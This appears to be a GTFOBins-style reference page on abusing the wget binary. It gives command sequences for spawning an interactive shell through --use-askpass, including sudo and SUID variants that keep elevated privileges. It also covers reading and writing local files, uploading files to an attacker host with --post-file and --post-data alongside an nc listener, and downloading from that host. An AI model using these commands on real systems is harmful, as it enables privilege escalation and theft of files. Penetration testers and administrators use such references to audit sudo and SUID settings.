.. / wget

Fork Star

• Shell
• File write
• File read
• Upload
• Download

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
  chmod +x /path/to/temp-file
  wget --use-askpass=/path/to/temp-file 0

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
  chmod +x /path/to/temp-file
  wget --use-askpass=/path/to/temp-file 0

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >/path/to/temp-file
  chmod +x /path/to/temp-file
  wget --use-askpass=/path/to/temp-file 0

File write

This executable can write data to local files.

• Comment

  The file to be read is treated as a list of URLs, one per line, which are actually fetched by wget. The content appears, somewhat modified, as error messages.

  Unprivileged

  This function can be performed by any unprivileged user.

  wget -i /path/to/input-file -o /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  wget -i /path/to/input-file -o /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  wget -i /path/to/input-file -o /path/to/output-file

File read

This executable can read data from local files.

• Comment

  The file to be read is treated as a list of URLs, one per line, which are actually fetched by wget. The content appears, somewhat modified, as error messages.

  Unprivileged

  This function can be performed by any unprivileged user.

  wget -i /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  wget -i /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  wget -i /path/to/input-file

  Remarks

  The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  wget --post-file=/path/to/input-file http://attacker.com

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  wget --post-file=/path/to/input-file http://attacker.com

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  wget --post-file=/path/to/input-file http://attacker.com

  Receiver

  An HTTP server can be used on the attacker box to receive the data.

  nc -l -p 80 | awk 'BEGIN {RS="\r\n\r\n";ORS=""} NR==2' >/path/to/output-file

• Unprivileged

  This function can be performed by any unprivileged user.

  wget --post-data=DATA http://attacker.com

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  wget --post-data=DATA http://attacker.com

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  wget --post-data=DATA http://attacker.com

  Receiver

  An HTTP server can be used on the attacker box to receive the data.

  nc -l -p 80 | awk 'BEGIN {RS="\r\n\r\n";ORS=""} NR==2' >/path/to/output-file

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  wget http://attacker.com/path/to/input-file -O /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  wget http://attacker.com/path/to/input-file -O /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  wget http://attacker.com/path/to/input-file -O /path/to/output-file

  Sender

  An HTTP server can be used on the attacker box to send the data.

  python -m http.server 80

Source | History